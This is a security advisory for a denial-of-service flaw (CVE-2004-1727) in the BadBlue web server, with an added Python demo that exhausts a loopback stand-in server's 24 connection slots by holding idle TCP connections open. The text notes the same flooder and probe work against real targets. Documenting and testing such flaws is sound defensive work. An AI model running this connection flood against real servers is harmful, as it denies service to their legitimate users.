BadBlue Denial Of Service
Vendor: BadBlue
Product: BadBlue
Version: <= 2.5
Website: http://www.badblue.com
BID: 10983
CVE: CVE-2004-1727
OSVDB: 9107
SECUNIA: 12346
PACKETSTORM: 34103
Description:
Share photos, videos, music, and business files with friends and colleagues instantly. Tired of paying a service to share your files (and the hassle of sending your files to their site)? BadBlue shares files directly from your own PC, using the cable/DSL/broadband/dialup connection you already paid for! BadBlue lets you run a no-hassle Web site on your own PC for free, including a domain name you can choose. Within seconds, you can transform your PC into a friendly, file-sharing Web server with all the power of a real server on the Internet. Remote users can search for files, explore your shared folders, and run full-blown applications created in HTML, PHP, Perl, and so on.

Denial Of Service Vulnerability:
BadBlue Webserver cannot handle many simultaneous connections from the same host: at around twenty-four concurrent connections it denies access to all other users. A proof of concept is included that floods the target server with a number of connections and then simply holds them open for as long as you specify, thus blocking all other traffic to the affected server. No authentication or special request is needed; idle connections alone are enough to occupy the server's connection slots.

Proof of Concept:
BadBlue Webserver Denial of Service POC Code
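The PoC itself is not reproduced on this page. The following is an added example (written for this edit, not the original GulfTech code and not BadBlue code) that demonstrates the connection-slot exhaustion described above end to end: a flooder that opens and holds a chosen number of idle TCP connections, a probe that reports whether the server still answers a minimal GET, and a constructed stand-in server that serves at most a fixed number of clients at once and drops everything beyond that. The stand-in server, its 24-slot limit (taken from the figure in the advisory), and the `wait_for_active` synchronisation helper are assumptions made so the demo runs offline against loopback; they are not claims about how BadBlue is implemented.

```python
"""Connection-slot exhaustion demo (added example, not the advisory's PoC)."""
import socket
import threading
import time


class SlotLimitedServer:
    """Constructed stand-in for a server with a fixed pool of connection slots.
    Serves at most `max_conns` clients at once and closes any further
    connection straight after accept(). The default of 24 mirrors the figure
    reported in the advisory; it is an assumption for this demo, not BadBlue."""

    def __init__(self, max_conns=24):
        self.max_conns = max_conns
        self.active = 0
        self.lock = threading.Lock()
        self._stopped = False
        self.listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.listener.bind(("127.0.0.1", 0))  # loopback only, ephemeral port
        self.listener.listen(64)
        self.listener.settimeout(0.2)  # lets the accept loop notice close()
        self.port = self.listener.getsockname()[1]
        threading.Thread(target=self._accept_loop, daemon=True).start()

    def _accept_loop(self):
        while not self._stopped:
            try:
                conn, _ = self.listener.accept()
            except socket.timeout:
                continue
            except OSError:
                return
            with self.lock:
                if self.active >= self.max_conns:
                    conn.close()  # no free slot: everyone else is denied
                    continue
                self.active += 1
            threading.Thread(target=self._handle, args=(conn,), daemon=True).start()

    def _handle(self, conn):
        try:
            conn.settimeout(30)  # an idle-connection timeout is the usual defence
            buf = b""
            while b"\r\n\r\n" not in buf:  # wait for a complete request line+headers
                chunk = conn.recv(1024)
                if not chunk:  # client went away without sending a request
                    return
                buf += chunk
            conn.sendall(b"HTTP/1.0 200 OK\r\nContent-Length: 2\r\n\r\nok")
        except OSError:
            pass
        finally:
            conn.close()
            with self.lock:
                self.active -= 1

    def wait_for_active(self, n, timeout=5.0):
        """Block until exactly `n` slots are occupied (synchronisation for the demo)."""
        deadline = time.monotonic() + timeout
        while time.monotonic() < deadline:
            with self.lock:
                if self.active == n:
                    return True
            time.sleep(0.01)
        return False

    def close(self):
        self._stopped = True
        self.listener.close()


def hold_connections(host, port, count, timeout=3.0):
    """Open `count` TCP connections and leave them idle. The sockets are returned
    so the caller chooses the hold time, as the advisory's PoC lets you specify."""
    return [socket.create_connection((host, port), timeout=timeout) for _ in range(count)]


def release_connections(held):
    for s in held:
        s.close()


def probe(host, port, timeout=2.0):
    """True if the server answers a minimal GET; False if the connection is
    refused, reset, closed without a reply, or times out."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(b"GET / HTTP/1.0\r\nHost: target\r\n\r\n")
            return s.recv(1024).startswith(b"HTTP/1.")
    except OSError:
        return False


if __name__ == "__main__":
    srv = SlotLimitedServer(max_conns=24)
    print("before flood:", probe("127.0.0.1", srv.port))
    srv.wait_for_active(0)
    held = hold_connections("127.0.0.1", srv.port, 24)
    srv.wait_for_active(24)
    print("during flood:", probe("127.0.0.1", srv.port))
    release_connections(held)
    srv.wait_for_active(0)
    print("after release:", probe("127.0.0.1", srv.port))
    srv.close()
```

Run as-is and the three probes print True, False, True: the server answers before the flood, stops answering once 24 idle connections occupy every slot, and recovers the moment they are released. Against a real target the same `hold_connections`/`probe` pair is a quick way to measure at what connection count a server stops serving, which is the behaviour the advisory reports at roughly 24.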

Solution:
The development team has been contacted and says it will look into this issue shortly. No fixed version was available at the time of writing; users are advised to upgrade as soon as one is released.

Credits:
James Bercegay of the GulfTech Security Research Team.